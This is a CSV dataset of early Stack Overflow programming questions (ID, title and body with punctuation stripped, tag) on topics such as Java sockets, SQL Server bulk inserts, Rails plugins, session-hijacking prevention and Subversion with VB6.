Id,Title,Tag
22590,how do i cluster an upload folder with aspnet we have a situation where users are allowed to upload content and then separately make some changes then submit a form based on those changesthis works fine in a singleserver nonfailover environment however we would like some sort of solution for sharing the files between servers that supports failoverhas anyone run into this in the past  and what kind of solutions were you able to develop  obviously persisting to the database is one option but wed prefer to avoid that,asp.net
22720,configure a java socket to failfast on disconnect i have a listening port on my server that im connecting to using a java class and the socket interface iesocket mysocket  new sockethostporti then grab an outputstream decorate with a printwriter in autoflush mode and im laughing  except if the listening port closes then i get tcp4       0      0  9999                                     listentcp        0      0  12700145737        1270019999         closewaitand i cant seem to detect the problem in the program  ive tried using the isconnected method on the socket but it doesnt seem to know that the connection is closedi want to be aware of the problem the next time i try and write to the socket so that i can try and reconnect and report the issueany advice pleasethanks all,java
22880,what is the best way to prevent session hijacking specifically this is regarding when using a client session cookie to identify a session on the serveris the best answer to use sslhttps encryption for the entire web site and you have the best guarantee that no man in the middle attacks will be able to sniff an existing client session cookieand perhaps second best to use some sort of encryption on the session value itself that is stored in your session cookieif a malicious user has physical access to a machine they can still look at the filesystem to retrieve a valid session cookie and use that to hijack a session,security
22980,actsasreadable rails plugin issue im using intrideas acts as readable rails plugin for a messaging system im currently buildingive defined my message class accordinglyclass post lt activerecordbase  actsasreadableendand everything seems to be working according to plan but when trying to execute to show unread messages in my message view im running into problemstheir example ive changed underscores to hyphens due to formatting issuesbob  userfindbynamebobbobreadings                       gt postfindunreadbybob           gt ltpost 1gtltpost 2gtltpost 3gtpostfindreadbybob             gt postfind1readbybob         gt falsepostfind1readbybob         gt ltreading 1gtpostfind1readbybob         gt truepostfind1userswhoread        gt ltuser bobgtpostfindunreadbybob           gt ltpost 2gtltpost 3gtpostfindreadbybob             gt ltpost 1gtbobreadings                       gt ltreading 1gtso it seems as though if i wanted to list the number of unread messages sitting in a mailbox for example inbox 39  i should be able to do something likelt postfindunreadbycurrentusercount gtbut to no avail  i always seem to get stuck on the simple view issues after everythings setany ideas,ruby-on-rails
23190,how does one sum dimensions of an array specified at runtime i am working on a function to establish the entropy of a distribution  it uses a copula if any are familiar with that  i need to sum up the values in the array based on which dimensions are cared aboutexample  consider the following example dimension 0 across             0  0  0  2   dimension 1 1  0  2  0    down 0  3  0  6  0  0  0  0 i care about dimension 0 only and dont care about the rest dim 1summing this array with the above specifications willcollapse the stacks of dimension 1 down to a single 4 x 1 array              1  3  2  8 this can then be summed or have any operation performedi need to do this with an array of n dimensions which could feasibly be 20 also i need to be able to do this caring about certain dimensions and collapsing the rest  i am having an especially hard time with this because i cant visualize 20 dimensions p  if anyone could help me set up some cc code to collapsesum i would be very very grateful  updatejust got home  here is some info to answer your questionssorry for rolling back the edits i was hoping when i clicked rollback it would show me the changes so i could see what i messed up a bit like wikipedia  this wasnt the case as i found outjeff  what doesnt make sense  i am using this great service for what i think is a legit reason  i want to get better at my hobby which is all it is as i am in high school  many of my posts regard implementing a genetic algorithm this post sparsearray rank an array pointer manipulationi am using a sparse array representation as it is possible to exceed the number of molecules in the universe using a traditional dense array  for now the implementation of the sparsearray itself doesnt matter a whole lot as i am working to make it work with a standard array before going to a sparse representation  for those who havent seen my previous questions i am using a binary search tree as the structure to contain the sparse array points and a driver function to traverse the tree as necessary returning whatever the function is designed to do  this is flexible so i can accomodate a lot of different methods of accessing the array the structure is a hypercube and the number of dimensions is specified at run time as well as the length of each dimension which are all the same as it is a hypercubethanks everyone for your imput,c++
23250,when do you use the this keyword i was curious about how other people use the this keyword i tend to use it in constructors but i may also use it throughout the class in other methods some examplesin a constructorpublic lightvector v    thisdir  new vectorvelsewherepublic void somemethod    vector vec  new vector    double d  vec  vec  thisradius  thisradius,c#
23270,how ie7 determines a sites security zone does anyone know how ie7 determines what security zone to use for a site  i see the basics for ie6 here but i cant find the equivalent for ie7,security
23310,source control beginners what would be the best version control system to learn as a beginner to source control,version-control
23370,notification of drop in dragdrop in windows my c program has a list of files that can be dragged from it and dropped into another program my requirements are that the file be copied to a different directory firstso can i be notified of the drop operation so that i can only copy the file if operation succeeds id rather wait till i know it needs to be copied before actually performing the copyalso is it possible to know what program the drop operation is occurring in ideally id like to alter the filepath based on who or what its being droppedthe solution to this can be in any net language or cc with com,c#
23490,what is your best list of must have development tools i recently burned up my development laptop it literally emitted smoke from the vents after pulling the hd i was unable to get it to spin with a usb device attached to a home tower since i was on a deadline i had to rush and buy a new laptop turion 64 x2 running vistaafter i installed my required applications vs20052008 sql server editions client tools adobe cs3 and source control clients i am wondering what list of must haves developer tools that are out there these days im a big fan of fiddler and linqpad but i am wondering what i am missingediti read the other question here and i am aware of hanselmans list i was not specific enough in my original question by these days i meant new and latest tools perhaps available only 64 bit which in geek years might just be 12 days i dunno edit,windows-vista
23610,windows  active directory  user  groups im looking for a way to find a the windows login associated with a specific group im trying to add permissions to a tool that only allows names formatted likedomainuser domaingroupi have a list of users in active directory format that i need to addougroup1ougroup2ougroup3i have tried adding domaingroup1 but i get a user not found errorps  should also be noted that im not a lan admin ,windows
23620,what javascript rich text editor will not break the browsers spellcheck im using tinymce in an aspnet project and i need a spell check the only tinymce plugins ive found use php on the server side and i guess i could just break down and install php on my server and do that but quite frankly what a pain i dont want to do thatas it turns out firefoxs builtin spell check will work fine for me but it doesnt seem to work on tinymce editor boxes ive enabled the geckospellcheck option which is supposed to fix it but it doesntdoes anybody know of a nice richtext editor that doesnt break the browsers spell check,javascript
23640,free or open source collaborationelearning software i am looking for open source or free data collaboration software specifically this is for a nonprofit organization that wants to teach remote students how a foreign language  the idea is that an instructor would teach a class and there would be up to 10 students in the class at a time  the instructor would be able to post slides or other teaching material and the students would be able to see it on their computers remotely  video is not required but audio is a must  any recommendationsalso if there have been any reviews or feature comparison amongst these products i would be interested in hearing about them,product
23770,good strategy for leaving an audit trailchange history for db applications what are some strategies that people have had success with for maintaining a change history for data in a fairly complex database one of the applications that i frequently use and develop for could really benefit from a more comprehensive way of tracking how records have changed over time for instance right now records can have a number of timestamp and modified user fields but we currently dont have a scheme for logging multiple change for instance if an operation is rolled back in a perfect world it would be possible to reconstruct the record as it was after each save etcsome info on the dbneeds to have the capacity to grow by thousands of records per week5060 tablesmain revisioned tables may have several million records eachreasonable amount of foreign keys and indexes setusing postgresql 8x,database
23930,factorial algorithms in different languages i want to see all the different ways you can come up with for a factorial subroutine or program the hope is that anyone can come here and see if they might want to learn a new languageideasproceduralfunctionalobject orientedone linersobfuscatedoddballbad codepolyglotbasically i want to see an example of different ways of writing an algorithm and what they would look like in different languagesplease limit it to one example per entryi will allow you to have more than one example per answer if you are trying to highlight a specific style language or just a well thought out idea that lends itself to being in one postthe only real requirement is it must find the factorial of a given argument in all languages representedbe creativerecommended guideline language name optional style type    optional bullet points    code goes hereother informational text goes herei will ocasionally go along and edit any answer that does not have decent formatting,algorithm
23950,best method to get objects from a blockingqueue in a concurrent program what is the best method to get objects out of a blockingqueue in a concurrent program without hitting a race condition  im currently doing the following and im not convinced it is the best methodblockingqueueltviolationgt vqueue in the constructor i pass in a blockingqueue object full of violations that need to be processed  cut out for brevityviolation vwhile   v  vqueuepoll500 timeunitmilliseconds   null       do stuff with the violationi have yet to hit a race condition but im none too sure if this is truly safe,java
23970,how do i marshal a lambda proc in ruby joe van dyk asked the ruby mailing list  hi    in ruby i guess you cant marshal a lambdaproc object right  is  that possible in lisp or other languages    what i was trying to dol  lamda   bjsubmit pathtorubyprogram stdin gt marshaldumpl  so im sending backgroundjob a lambda object which contains the  contextcode for what to do  but guess that wasnt possible  i  ended up marshaling a normal ruby object that contained instructions  for what to do after the program ran    joe,ruby
24040,is there a site for detailed unit testing samples is there a site for unit testing as refactormycode for refactoring i think it would be a great help for beginners like me,unit-testing
24130,classes vs 2d arrays which is better to use in php a 2d array or a class ive included an example of what i mean by this using a classclass someclass    public  name    public  height    public  weight    function constructname height weight            this gt name        name        this gt height  height        this gt weight  weight    classarray1  new someclassbob 10 20classarray2  new someclassfred 15 10classarray3  new someclassned 25 30 using a 2d arraynormalarray1name  bobnormalarray1height    10normalarray1weight    20normalarray2name  frednormalarray2height    15normalarray2weight    10normalarray3name  nednormalarray3height    25normalarray3weight    30assuming that somebody doesnt come out and show that classes are too slow it looks like class winsive not idea which answer i should accept to ive just upvoted all of themand i have now written two near identical pages one using the 2d array written before this question was posted and now one using a class and i must say that the class produces much nicer code i have no idea how much overhead is going to be generated but i doubt it will rival the improvement to the code itselfthank you for helping to make me a better programmer,php
24200,whats the fastest way to bulk insert a lot of data in sql server c client i am hitting some performance bottlenecks with my c client inserting bulk data into a sql server 2005 database and im looking for ways in which to speed up the processi am already using the sqlclientsqlbulkcopy which is based on tds to speed up the data transfer across the wire which helped a lot but im still looking for morei have a simple table that looks like this  create table bulkdata containerid int not null binid smallint not null sequence smallint not null itemid int not null left smallint not null top smallint not null right smallint not null bottom smallint not null constraint pkbulkdata primary key clustered    containeridid asc  binid asc  sequence ascim inserting data in chunks that average about 300 rows where containerid and binid are constant in each chunk and the sequence value is 0n and the values are presorted based on the primary key  the disk time performance counter spends a lot of time at 100 so it is clear that disk io is the main issue but the speeds im getting are several orders of magnitude below a raw file copydoes it help any if idrop the primary key while i am doing the inserting and recreate it laterdo inserts into a temporary table with the same schema and periodically transfer them into the main table to keep the size of the table where insertions are happening smallanything elsebased on the responses i have gotten let me clarify a little bitportman im using a clustered index because when the data is all imported i will need to access data sequentially in that order  i dont particularly need the index to be there while importing the data  is there any advantage to having a nonclustered pk index while doing the inserts as opposed to dropping the constraint entirely for importchopeen  the data is being generated remotely on many other machines my sql server can only handle about 10 currently but i would love to be able to add more  its not practical to run the entire process on the local machine because it would then have to process 50 times as much input data to generate the outputjason i am not doing any concurrent queries against the table during the import process i will try dropping the primary key and see if that helps,c#
24270,whats the point of oop as far as i can tell in spite of the countless millions or billions spent on oop education languages and tools oop has not improved developer productivity or software reliability nor has it reduced development costs few people use oop in any rigorous sense few people adhere to or understand principles such as lsp there seems to be little uniformity or consistency to the approaches that people take to modelling problem domains  all too often the class is used simply for its syntactic sugar it puts the functions for a record type into their own little namespaceive written a large amount of code for a wide variety of applications although there have been places where true substitutable subtyping played a valuable role in the application these have been pretty exceptional in general though much lip service is given to talk of reuse the reality is that unless a piece of code does exactly what you want it to do theres very little costeffective reuse  its extremely hard to design classes to be extensible in the right way and so the cost of extension is normally so great that reuse simply isnt worthwhilein many regards this doesnt surprise me  the real world isnt oo and the idea implicit in oothat we can model things with some class taxonomyseems to me very fundamentally flawed i can sit on a table a tree stump a car bonnet someones lapbut not one of those isa chair  even if we move to more abstract domains oo modelling is often difficult counterintuitive and ultimately unhelpful consider the classic examples of circlesellipses or squaresrectanglesso what am i missing here wheres the value of oop and why has all the time and money failed to make software any better,language-agnostic
24310,programming a simple irc internetrelaychat client i started using irc at a young age and i have always been fascinated with it  as a language exercise i was thinking about programming a simple irc client in ruby with shoes as a graphical frontend  my question to you kindsirs what do i need to become familiar with to start on this great adventure besides shoes and ruby of course  i imagine there is somesort of specification on irc protocol  any pointers,ruby
24450,what are the best mvc web frameworks on the market i am looking for a web framework to move windows based applications to the webthe main requirements to wf are the followingunit tests supportdesktop and mobile browsers supportlong term viabilitymaturity of the framework,model-view-controller
24470,sql server examples of pivoting string data trying to find some simple sql server pivot examples  most of the examples that i have found involve counting or summing up numbers  i just want to pivot some string data  for example i have a query returning the followingaction1 view  action1 edit  action2 view  action3 view  action3 edit  i would like to use pivot if even possible to make the results like soaction1 view edit  action2 view null  action3 view edit  is this even possible with the pivot functionality,sql-server
24580,how do you automate a visual studio build how do you turn a visual studio build that youd perform in the ide into a script that you can run from the command line,visual-studio
24610,vi editing for visual studio im used to the vim editor and am using ms visual studio 2005 at work i couldnt find a free vi addin theres only one for the 2003 version i googled a bit saw that there was a google summer of code project this year to write such an addin and am eagerly awaiting the result ive also heard of viemu not free and i cant test it at workhas anyone in my situation has found a solution andor tested viemuedit i cant test viemu at work because they are paranoid about what we install on our boxes it has to go through required channels and for 30 days i dont reckon its worth it and i have no windows box at homeedit since both answers were equivalent i ended up accepting the first one that came in,visual-studio
24620,why should you prevent a class from being subclassed what can be reasons to prevent a class from being inherited eg using sealed on a c classright now i cant think of any,oop
24680,using subversion with visual basic 6 my team is moving from visual sourcesafe to subversion soon while developingsupporting a legacy project in visual basic 60 so i have a couple of questionswhats the best tool for subversion ide integration in visual studio 6 or is it not worth the troubleare there any best practices for using subversion with visual basic 60 file types to ignore etc,svn
24730,what is this multiplestep ole db error im doing a little bit of work on a horrid piece of software built by bangalores bestits written in mostly classic aspvbscript but ported to aspnet though most of the code is classic asp style in the aspx pages im getting this message when it tries to connect to my local databasemultiplestep ole db operation generated errors check each ole db status value if available no work was doneline 38    masterconn  new adodbconnectionline 39    masterconnconnectiontimeout  10000line 40        masterconnopenstrdbanybody have a clue what this error means its connecting to my local machine running sqlexpress using this connection stringprovidermsdasqldriversql serverserverjonathanpcsqlexpressdatabasenettrainingintegrated securitytruewhich is the connection string that it was initially using i just repointed it at my databaseupdatethe issue was using integrated security with ado i changed to using a user account and it connected just fine,asp-classic
